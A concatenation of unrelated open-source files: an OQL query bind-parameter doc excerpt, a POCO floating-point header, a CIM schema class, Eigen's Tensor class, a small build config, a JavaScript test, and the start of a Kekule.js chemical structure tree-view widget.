In the following example, the first parameter, the integer **2**, is bound to the first element in the object array. The second parameter, **active**, is bound to the second element.
## <a id="concept_173E775FE46B47DF9D7D1E40680D34DF__section_7F5A800E2DA643F2B30162EF45DBA390" class="no-quick-link"></a>Sample Code
``` pre
// specify the query string
String queryString = "SELECT DISTINCT * FROM /exampleRegion p WHERE p.id = $1 and p.status = $2";
QueryService queryService = cache.getQueryService();
Query query = queryService.newQuery(queryString);
// set query bind parameters
Object[] params = new Object[2];
params[0] = 2;
params[1] = "active";
// Execute the query locally. It returns the results set.
SelectResults results = (SelectResults) query.execute(params);
// use the results of the query; this example only looks at the size
int size = results.size();
```
## <a id="concept_173E775FE46B47DF9D7D1E40680D34DF__section_90B4A0010CDA481581B650AE6D9EBA34" class="no-quick-link"></a>Using Query Bind Parameters in the Path Expression
Additionally the query engine supports the use of query bind parameter in place of a region path. When you specify a bind parameter in the query's FROM clause, the parameter's referenced value must be bound to a collection.
**Examples:**
The following query can be used on any collection by passing in the collection as a query parameter value. In this query you could pass in a Region object for $1, but not the String name of a region.
``` pre
SELECT DISTINCT * FROM $1 p WHERE p.status = $2
```
Get all the keys from the region passed as a Region object for $1 for those entries whose name attribute is equal to the value passed for $2:
``` pre
SELECT e.key FROM ($1).entrySet e WHERE e.value.name=$2"
```
| {
"pile_set_name": "Github"
} |
//
// FPEnvironment_WIN32.h
//
// Library: Foundation
// Package: Core
// Module: FPEnvironment
//
// Definitions of class FPEnvironmentImpl for WIN32.
//
// Copyright (c) 2004-2006, Applied Informatics Software Engineering GmbH.
// and Contributors.
//
// SPDX-License-Identifier: BSL-1.0
//
#ifndef Foundation_FPEnvironment_WIN32_INCLUDED
#define Foundation_FPEnvironment_WIN32_INCLUDED
#include "Poco/Foundation.h"
#include <float.h>
#include <math.h>
#ifndef _SW_INEXACT
# define _SW_INEXACT 0x00000001 // inexact (precision)
#endif
#ifndef _SW_UNDERFLOW
# define _SW_UNDERFLOW 0x00000002 // underflow
#endif
#ifndef _SW_OVERFLOW
# define _SW_OVERFLOW 0x00000004 // overflow
#endif
#ifndef _SW_ZERODIVIDE
# define _SW_ZERODIVIDE 0x00000008 // zero divide
#endif
#ifndef _SW_INVALID
# define _SW_INVALID 0x00000010 // invalid
#endif
#ifndef _SW_DENORMAL
# define _SW_DENORMAL 0x00080000 // denormal status bit
#endif
namespace Poco {
class Foundation_API FPEnvironmentImpl
{
protected:
enum RoundingModeImpl
{
FP_ROUND_DOWNWARD_IMPL = _RC_DOWN,
FP_ROUND_UPWARD_IMPL = _RC_UP,
FP_ROUND_TONEAREST_IMPL = _RC_NEAR,
FP_ROUND_TOWARDZERO_IMPL = _RC_CHOP
};
enum FlagImpl
{
FP_DIVIDE_BY_ZERO_IMPL = _SW_ZERODIVIDE,
FP_INEXACT_IMPL = _SW_INEXACT,
FP_OVERFLOW_IMPL = _SW_OVERFLOW,
FP_UNDERFLOW_IMPL = _SW_UNDERFLOW,
FP_INVALID_IMPL = _SW_INVALID
};
FPEnvironmentImpl();
FPEnvironmentImpl(const FPEnvironmentImpl& env);
~FPEnvironmentImpl();
FPEnvironmentImpl& operator = (const FPEnvironmentImpl& env);
void keepCurrentImpl();
static void clearFlagsImpl();
static bool isFlagImpl(FlagImpl flag);
static void setRoundingModeImpl(RoundingModeImpl mode);
static RoundingModeImpl getRoundingModeImpl();
static bool isInfiniteImpl(float value);
static bool isInfiniteImpl(double value);
static bool isInfiniteImpl(long double value);
static bool isNaNImpl(float value);
static bool isNaNImpl(double value);
static bool isNaNImpl(long double value);
static float copySignImpl(float target, float source);
static double copySignImpl(double target, double source);
static long double copySignImpl(long double target, long double source);
private:
unsigned _env;
};
//
// inlines
//
inline bool FPEnvironmentImpl::isInfiniteImpl(float value)
{
return _finite(value) == 0;
}
inline bool FPEnvironmentImpl::isInfiniteImpl(double value)
{
return _finite(value) == 0;
}
inline bool FPEnvironmentImpl::isInfiniteImpl(long double value)
{
return _finite(value) == 0;
}
inline bool FPEnvironmentImpl::isNaNImpl(float value)
{
return _isnan(value) != 0;
}
inline bool FPEnvironmentImpl::isNaNImpl(double value)
{
return _isnan(value) != 0;
}
inline bool FPEnvironmentImpl::isNaNImpl(long double value)
{
return _isnan(value) != 0;
}
inline float FPEnvironmentImpl::copySignImpl(float target, float source)
{
return float(_copysign(target, source));
}
inline double FPEnvironmentImpl::copySignImpl(double target, double source)
{
return _copysign(target, source);
}
inline long double FPEnvironmentImpl::copySignImpl(long double target, long double source)
{
return (source > 0 && target > 0) || (source < 0 && target < 0) ? target : -target;
}
} // namespace Poco
#endif // Foundation_FPEnvironment_WIN32_INCLUDED
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2005 DMTF. All rights reserved.
[Version ( "2.8.0" ),
UMLPackagePath ( "CIM::Interop" ),
Description (
"A ObjectManagerAdapter is a Service of the CIM Object Manager. "
"An adapter can be any service of the Object Manager that needs "
"to be managed (e.g. started, stopped, monitored, ...). There "
"MUST be an instance for each Adapter type." )]
class CIM_ObjectManagerAdapter : CIM_WBEMService {
[Override ( "Name" ),
Description (
"A human-readable name that uniquely identifies the "
"ObjectManager within a system." )]
string Name;
[Override ( "ElementName" ),
Description (
"The ElmentName property is used as a name of the Object "
"Manager Adapter for human interfaces. For example, \"ACME "
"ObjectManager Adapter\"." )]
string ElementName;
[Required, Description (
"An implementation specific string that identifies the "
"handle to the Object Manager Adapter." )]
string Handle;
[Required, Description (
"AdapterType enumerates the kind of Object Manager "
"Adapter. If \'Other\' is specified, the "
"OtherAdapterTypeDescription property MUST be populated. \n"
"Other - If the adapter does not fit into one of the "
"other catagories in the list. If specified, the "
"OtherAdapterTypeDescription property MUST be populated. \n"
"Client - A client side adapter that responds to client "
"operation requests, such as CIM-XML or CIM-SOAP. \n"
"Provider - A provider adapter, such as DMI, SNMP, JSR48 "
"or CMPI. \n"
"Indication Handler - An Indication Handler is a service "
"that delivers indications to a subscriber. Examples of "
"possible Indication Handlers are CIM-XML, CIM-SOAP, SMPT "
"(e-mail) or any other delivery mechanism. \n"
"Repository - A repository is an adapter that can "
"store/retrieve persistent data, such as CIM Qualifier "
"Types, CIM Classes and CIM Instances. An Object Manager "
"could use multiple repositiories at one time, for "
"example one could be used for CIM Schema information "
"only, while another is used for instance information. "
"Repositories MAY be remote or local to the CIM Object "
"Manager. Examples of repository implementations could be "
"databases, LDAP or files." ),
ValueMap { "1", "2", "3", "4", "5" },
Values { "Other", "Client", "Provider", "Indication Handler",
"Repository" },
ModelCorrespondence {
"CIM_ObjectManagerAdapter.OtherAdapterTypeDescription" }]
uint16 AdapterType;
[Description (
"The type(s) of ObjectManagerAdapter when \"Other\" is "
"included in ObjectManagerAdapterType property." ),
ModelCorrespondence { "CIM_ObjectManagerAdapter.AdapterType" }]
string OtherAdapterTypeDescription;
};
| {
"pile_set_name": "Github"
} |
// This file is part of Eigen, a lightweight C++ template library
// for linear algebra.
//
// Copyright (C) 2014 Benoit Steiner <[email protected]>
// Copyright (C) 2013 Christian Seiler <[email protected]>
//
// This Source Code Form is subject to the terms of the Mozilla
// Public License v. 2.0. If a copy of the MPL was not distributed
// with this file, You can obtain one at http://mozilla.org/MPL/2.0/.
#ifndef EIGEN_CXX11_TENSOR_TENSOR_H
#define EIGEN_CXX11_TENSOR_TENSOR_H
namespace Eigen {
/** \class Tensor
* \ingroup CXX11_Tensor_Module
*
* \brief The tensor class.
*
* The %Tensor class is the work-horse for all \em dense tensors within Eigen.
*
* The %Tensor class encompasses only dynamic-size objects so far.
*
* The first two template parameters are required:
* \tparam Scalar_ Numeric type, e.g. float, double, int or `std::complex<float>`.
* User defined scalar types are supported as well (see \ref user_defined_scalars "here").
* \tparam NumIndices_ Number of indices (i.e. rank of the tensor)
*
* The remaining template parameters are optional -- in most cases you don't have to worry about them.
* \tparam Options_ A combination of either \b #RowMajor or \b #ColMajor, and of either
* \b #AutoAlign or \b #DontAlign.
* The former controls \ref TopicStorageOrders "storage order", and defaults to column-major. The latter controls alignment, which is required
* for vectorization. It defaults to aligning tensors. Note that tensors currently do not support any operations that profit from vectorization.
* Support for such operations (i.e. adding two tensors etc.) is planned.
*
* You can access elements of tensors using normal subscripting:
*
* \code
* Eigen::Tensor<double, 4> t(10, 10, 10, 10);
* t(0, 1, 2, 3) = 42.0;
* \endcode
*
* This class can be extended with the help of the plugin mechanism described on the page
* \ref TopicCustomizing_Plugins by defining the preprocessor symbol \c EIGEN_TENSOR_PLUGIN.
*
* <i><b>Some notes:</b></i>
*
* <dl>
* <dt><b>Relation to other parts of Eigen:</b></dt>
* <dd>The midterm development goal for this class is to have a similar hierarchy as Eigen uses for matrices, so that
* taking blocks or using tensors in expressions is easily possible, including an interface with the vector/matrix code
* by providing .asMatrix() and .asVector() (or similar) methods for rank 2 and 1 tensors. However, currently, the %Tensor
* class does not provide any of these features and is only available as a stand-alone class that just allows for
* coefficient access. Also, when fixed-size tensors are implemented, the number of template arguments is likely to
* change dramatically.</dd>
* </dl>
*
* \ref TopicStorageOrders
*/
template<typename Scalar_, int NumIndices_, int Options_, typename IndexType_>
class Tensor : public TensorBase<Tensor<Scalar_, NumIndices_, Options_, IndexType_> >
{
public:
typedef Tensor<Scalar_, NumIndices_, Options_, IndexType_> Self;
typedef TensorBase<Tensor<Scalar_, NumIndices_, Options_, IndexType_> > Base;
typedef typename Eigen::internal::nested<Self>::type Nested;
typedef typename internal::traits<Self>::StorageKind StorageKind;
typedef typename internal::traits<Self>::Index Index;
typedef Scalar_ Scalar;
typedef typename NumTraits<Scalar>::Real RealScalar;
typedef typename Base::CoeffReturnType CoeffReturnType;
enum {
IsAligned = bool(EIGEN_MAX_ALIGN_BYTES>0) & !(Options_&DontAlign),
Layout = Options_ & RowMajor ? RowMajor : ColMajor,
CoordAccess = true,
RawAccess = true
};
static const int Options = Options_;
static const int NumIndices = NumIndices_;
typedef DSizes<Index, NumIndices_> Dimensions;
protected:
TensorStorage<Scalar, Dimensions, Options> m_storage;
#ifdef EIGEN_HAS_SFINAE
template<typename CustomIndices>
struct isOfNormalIndex{
static const bool is_array = internal::is_base_of<array<Index, NumIndices>, CustomIndices>::value;
static const bool is_int = NumTraits<CustomIndices>::IsInteger;
static const bool value = is_array | is_int;
};
#endif
public:
// Metadata
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index rank() const { return NumIndices; }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index dimension(std::size_t n) const { return m_storage.dimensions()[n]; }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Dimensions& dimensions() const { return m_storage.dimensions(); }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index size() const { return m_storage.size(); }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar *data() { return m_storage.data(); }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar *data() const { return m_storage.data(); }
// This makes EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
// work, because that uses base().coeffRef() - and we don't yet
// implement a similar class hierarchy
inline Self& base() { return *this; }
inline const Self& base() const { return *this; }
#if EIGEN_HAS_VARIADIC_TEMPLATES
template<typename... IndexTypes>
EIGEN_DEVICE_FUNC inline const Scalar& coeff(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) const
{
// The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
return coeff(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
}
#endif
// normal indices
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(const array<Index, NumIndices>& indices) const
{
eigen_internal_assert(checkIndexRange(indices));
return m_storage.data()[linearizedIndex(indices)];
}
// custom indices
#ifdef EIGEN_HAS_SFINAE
template<typename CustomIndices,
EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(CustomIndices& indices) const
{
return coeff(internal::customIndices2Array<Index,NumIndices>(indices));
}
#endif
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff() const
{
EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
return m_storage.data()[0];
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(Index index) const
{
eigen_internal_assert(index >= 0 && index < size());
return m_storage.data()[index];
}
#if EIGEN_HAS_VARIADIC_TEMPLATES
template<typename... IndexTypes>
inline Scalar& coeffRef(Index firstIndex, Index secondIndex, IndexTypes... otherIndices)
{
// The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
return coeffRef(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
}
#endif
// normal indices
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(const array<Index, NumIndices>& indices)
{
eigen_internal_assert(checkIndexRange(indices));
return m_storage.data()[linearizedIndex(indices)];
}
// custom indices
#ifdef EIGEN_HAS_SFINAE
template<typename CustomIndices,
EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(CustomIndices& indices)
{
return coeffRef(internal::customIndices2Array<Index,NumIndices>(indices));
}
#endif
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef()
{
EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
return m_storage.data()[0];
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(Index index)
{
eigen_internal_assert(index >= 0 && index < size());
return m_storage.data()[index];
}
#if EIGEN_HAS_VARIADIC_TEMPLATES
template<typename... IndexTypes>
inline const Scalar& operator()(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) const
{
// The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
return this->operator()(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
}
#else
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1) const
{
return coeff(array<Index, 2>(i0, i1));
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2) const
{
return coeff(array<Index, 3>(i0, i1, i2));
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2, Index i3) const
{
return coeff(array<Index, 4>(i0, i1, i2, i3));
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2, Index i3, Index i4) const
{
return coeff(array<Index, 5>(i0, i1, i2, i3, i4));
}
#endif
// custom indices
#ifdef EIGEN_HAS_SFINAE
template<typename CustomIndices,
EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(CustomIndices& indices) const
{
return coeff(internal::customIndices2Array<Index,NumIndices>(indices));
}
#endif
// normal indices
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(const array<Index, NumIndices>& indices) const
{
return coeff(indices);
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(Index index) const
{
eigen_internal_assert(index >= 0 && index < size());
return coeff(index);
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()() const
{
EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
return coeff();
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator[](Index index) const
{
// The bracket operator is only for vectors, use the parenthesis operator instead.
EIGEN_STATIC_ASSERT(NumIndices == 1, YOU_MADE_A_PROGRAMMING_MISTAKE);
return coeff(index);
}
#if EIGEN_HAS_VARIADIC_TEMPLATES
template<typename... IndexTypes>
inline Scalar& operator()(Index firstIndex, Index secondIndex, IndexTypes... otherIndices)
{
// The number of indices used to access a tensor coefficient must be equal to the rank of the tensor.
EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
return operator()(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}});
}
#else
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1)
{
return coeffRef(array<Index, 2>(i0, i1));
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2)
{
return coeffRef(array<Index, 3>(i0, i1, i2));
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2, Index i3)
{
return coeffRef(array<Index, 4>(i0, i1, i2, i3));
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2, Index i3, Index i4)
{
return coeffRef(array<Index, 5>(i0, i1, i2, i3, i4));
}
#endif
// normal indices
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(const array<Index, NumIndices>& indices)
{
return coeffRef(indices);
}
// custom indices
#ifdef EIGEN_HAS_SFINAE
template<typename CustomIndices,
EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) )
>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(CustomIndices& indices)
{
return coeffRef(internal::customIndices2Array<Index,NumIndices>(indices));
}
#endif
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(Index index)
{
eigen_assert(index >= 0 && index < size());
return coeffRef(index);
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()()
{
EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
return coeffRef();
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator[](Index index)
{
// The bracket operator is only for vectors, use the parenthesis operator instead
EIGEN_STATIC_ASSERT(NumIndices == 1, YOU_MADE_A_PROGRAMMING_MISTAKE)
return coeffRef(index);
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Tensor()
: m_storage()
{
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Tensor(const Self& other)
: m_storage(other.m_storage)
{
}
#if EIGEN_HAS_VARIADIC_TEMPLATES
template<typename... IndexTypes>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index firstDimension, IndexTypes... otherDimensions)
: m_storage(firstDimension, otherDimensions...)
{
// The number of dimensions used to construct a tensor must be equal to the rank of the tensor.
EIGEN_STATIC_ASSERT(sizeof...(otherDimensions) + 1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
}
#else
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE explicit Tensor(Index dim1)
: m_storage(dim1, array<Index, 1>(dim1))
{
EIGEN_STATIC_ASSERT(1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2)
: m_storage(dim1*dim2, array<Index, 2>(dim1, dim2))
{
EIGEN_STATIC_ASSERT(2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3)
: m_storage(dim1*dim2*dim3, array<Index, 3>(dim1, dim2, dim3))
{
EIGEN_STATIC_ASSERT(3 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3, Index dim4)
: m_storage(dim1*dim2*dim3*dim4, array<Index, 4>(dim1, dim2, dim3, dim4))
{
EIGEN_STATIC_ASSERT(4 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3, Index dim4, Index dim5)
: m_storage(dim1*dim2*dim3*dim4*dim5, array<Index, 5>(dim1, dim2, dim3, dim4, dim5))
{
EIGEN_STATIC_ASSERT(5 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
}
#endif
/** Normal Dimension */
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE explicit Tensor(const array<Index, NumIndices>& dimensions)
: m_storage(internal::array_prod(dimensions), dimensions)
{
EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
}
template<typename OtherDerived>
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Tensor(const TensorBase<OtherDerived, ReadOnlyAccessors>& other)
{
typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
Assign assign(*this, other.derived());
resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
}
template<typename OtherDerived>
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Tensor(const TensorBase<OtherDerived, WriteAccessors>& other)
{
typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
Assign assign(*this, other.derived());
resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
}
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Tensor& operator=(const Tensor& other)
{
typedef TensorAssignOp<Tensor, const Tensor> Assign;
Assign assign(*this, other);
resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
return *this;
}
template<typename OtherDerived>
EIGEN_DEVICE_FUNC
EIGEN_STRONG_INLINE Tensor& operator=(const OtherDerived& other)
{
typedef TensorAssignOp<Tensor, const OtherDerived> Assign;
Assign assign(*this, other);
resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions());
internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice());
return *this;
}
#if EIGEN_HAS_VARIADIC_TEMPLATES
template<typename... IndexTypes> EIGEN_DEVICE_FUNC
void resize(Index firstDimension, IndexTypes... otherDimensions)
{
// The number of dimensions used to resize a tensor must be equal to the rank of the tensor.
EIGEN_STATIC_ASSERT(sizeof...(otherDimensions) + 1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE)
resize(array<Index, NumIndices>{{firstDimension, otherDimensions...}});
}
#endif
/** Normal Dimension */
EIGEN_DEVICE_FUNC void resize(const array<Index, NumIndices>& dimensions)
{
int i;
Index size = Index(1);
for (i = 0; i < NumIndices; i++) {
internal::check_rows_cols_for_overflow<Dynamic>::run(size, dimensions[i]);
size *= dimensions[i];
}
#ifdef EIGEN_INITIALIZE_COEFFS
bool size_changed = size != this->size();
m_storage.resize(size, dimensions);
if(size_changed) EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED
#else
m_storage.resize(size, dimensions);
#endif
}
// Why this overload, DSizes is derived from array ??? //
EIGEN_DEVICE_FUNC void resize(const DSizes<Index, NumIndices>& dimensions) {
array<Index, NumIndices> dims;
for (int i = 0; i < NumIndices; ++i) {
dims[i] = dimensions[i];
}
resize(dims);
}
EIGEN_DEVICE_FUNC
void resize()
{
EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE);
// Nothing to do: rank 0 tensors have fixed size
}
/** Custom Dimension */
#ifdef EIGEN_HAS_SFINAE
template<typename CustomDimension,
EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomDimension>::value) )
>
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void resize(CustomDimension& dimensions)
{
resize(internal::customIndices2Array<Index,NumIndices>(dimensions));
}
#endif
#ifndef EIGEN_EMULATE_CXX11_META_H
template <typename std::ptrdiff_t... Indices>
EIGEN_DEVICE_FUNC
void resize(const Sizes<Indices...>& dimensions) {
array<Index, NumIndices> dims;
for (int i = 0; i < NumIndices; ++i) {
dims[i] = static_cast<Index>(dimensions[i]);
}
resize(dims);
}
#else
template <std::size_t V1, std::size_t V2, std::size_t V3, std::size_t V4, std::size_t V5>
EIGEN_DEVICE_FUNC
void resize(const Sizes<V1, V2, V3, V4, V5>& dimensions) {
array<Index, NumIndices> dims;
for (int i = 0; i < NumIndices; ++i) {
dims[i] = static_cast<Index>(dimensions[i]);
}
resize(dims);
}
#endif
protected:
bool checkIndexRange(const array<Index, NumIndices>& indices) const
{
using internal::array_apply_and_reduce;
using internal::array_zip_and_reduce;
using internal::greater_equal_zero_op;
using internal::logical_and_op;
using internal::lesser_op;
return
// check whether the indices are all >= 0
array_apply_and_reduce<logical_and_op, greater_equal_zero_op>(indices) &&
// check whether the indices fit in the dimensions
array_zip_and_reduce<logical_and_op, lesser_op>(indices, m_storage.dimensions());
}
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index linearizedIndex(const array<Index, NumIndices>& indices) const
{
if (Options&RowMajor) {
return m_storage.dimensions().IndexOfRowMajor(indices);
} else {
return m_storage.dimensions().IndexOfColMajor(indices);
}
}
};
} // end namespace Eigen
#endif // EIGEN_CXX11_TENSOR_TENSOR_H
| {
"pile_set_name": "Github"
} |
POM_ARTIFACT_ID=assertj-android-cardview-v7
POM_NAME=AssertJ for Android CardView v7
POM_PACKAGING=aar
| {
"pile_set_name": "Github"
} |
$(document).ready(function() {
module("String extensions");
test("underscore not included", function() {
raises(function() { _("foo") }, /TypeError/);
});
test("provides standalone functions", function() {
equal(typeof _.str.trim, "function");
});
});
| {
"pile_set_name": "Github"
} |
/**
* @fileoverview
* A tree widget to display the internal structure of chem object (such as ChemSpace, Molecule and so on).
* @author Partridge Jiang
*/
/*
* requires /lan/classes.js
* requires /utils/kekule.utils.js
* requires /widgets/kekule.widget.nestedContainers.js
* requires /widgets/commonCtrls/kekule.widget.treeViews.js
* requires /widgets/chem/kekule.chemWidget.base.js
*/
(function(){
"use strict";
var CCNS = Kekule.ChemWidget.HtmlClassNames;
/** @ignore */
Kekule.ChemWidget.HtmlClassNames = Object.extend(Kekule.ChemWidget.HtmlClassNames, {
CHEM_STRUCT_TREE_VIEW: 'K-Chem-Struct-TreeView',
CHEM_STRUCT_TREE_VIEW_ITEM_TITLE: 'K-Chem-Struct-TreeView-ItemTitle',
CHEM_STRUCT_TREE_VIEW_ITEM_TYPE: 'K-Chem-Struct-TreeView-ItemType'
});
/**
* An tree view widget to display internal relationship of chem objects.
* @class
* @augments Kekule.Widget.TreeView
*
* @param {Variant} parentOrElementOrDocument
* @param {Kekule.ChemObject} rootObj
*
* @property {Kekule.ChemObject} rootObj Root chem object to be displayed in tree view.
* @property {Bool} enableLiveUpdate If set to true, the tree view will automatically updated when chem objects changed.
*/
Kekule.ChemWidget.StructureTreeView = Class.create(Kekule.Widget.TreeView,
/** @lends Kekule.ChemWidget.StructureTreeView# */
{
/** @private */
CLASS_NAME: 'Kekule.ChemWidget.StructureTreeView',
/** @construct */
initialize: function(/*$super, */parentOrElementOrDocument, rootObj)
{
this.tryApplySuper('initialize', [parentOrElementOrDocument]) /* $super(parentOrElementOrDocument) */;
this.setPropStoreFieldValue('objMap', new Kekule.MapEx(true));
this.setEnableLiveUpdate(true);
this.setEnableMultiSelect(true);
this.setRootObj(rootObj);
this._pauseLiveUpdateFlag = 0;
this._changedObjects = [];
},
/** @private */
initProperties: function()
{
this.defineProp('rootObj', {'dataType': 'Kekule.ChemObject', 'serializable': false,
'setter': function(value)
{
var oldObj = this.getPropStoreFieldValue('rootObj');
this.setPropStoreFieldValue('rootObj', value);
this.rootObjChanged(value, oldObj);
}
});
this.defineProp('enableLiveUpdate', {'dataType': DataType.BOOL});
this.defineProp('objMap', {'dataType': 'Kekule.MapEx', 'setter': null, 'serializable': false}); // private property
},
/** @ignore */
doGetWidgetClassName: function(/*$super*/)
{
return this.tryApplySuper('doGetWidgetClassName') /* $super() */ + ' ' + CCNS.CHEM_STRUCT_TREE_VIEW;
},
/** @private */
rootObjChanged: function(newValue, oldValue)
{
this.clearChildItems();
this.getObjMap().clear();
if (oldValue)
this._uninstallRootEventHandler(oldValue);
if (newValue)
{
this._fillTree(newValue);
this._installRootEventHandler(newValue);
}
},
/**
* Pause the live update process.
* Changed objects will be stored and the corresponding tree items will be refreshed
* after the live update is resumed.
*/
pauseLiveUpdate: function()
{
if (this._pauseLiveUpdateFlag >= 0)
{
this._pauseLiveUpdateFlag = 0;
this._changedObjects = [];
}
--this._pauseLiveUpdateFlag;
return this;
},
/**
* Resume the live update process.
*/
resumeLiveUpdate: function()
{
++this._pauseLiveUpdateFlag;
if (this._pauseLiveUpdateFlag >= 0) // do actual resume
{
this._pauseLiveUpdateFlag = 0;
for (var i = 0, l = this._changedObjects.length; i < l; ++i)
{
this.refreshObject(this._changedObjects[i]);
}
}
},
isLiveUpdatePaused: function()
{
return (this._pauseLiveUpdateFlag < 0);
},
/** @private */
_installRootEventHandler: function(root)
{
root.addEventListener('change', this.reactChemObjChange, this);
},
/** @private */
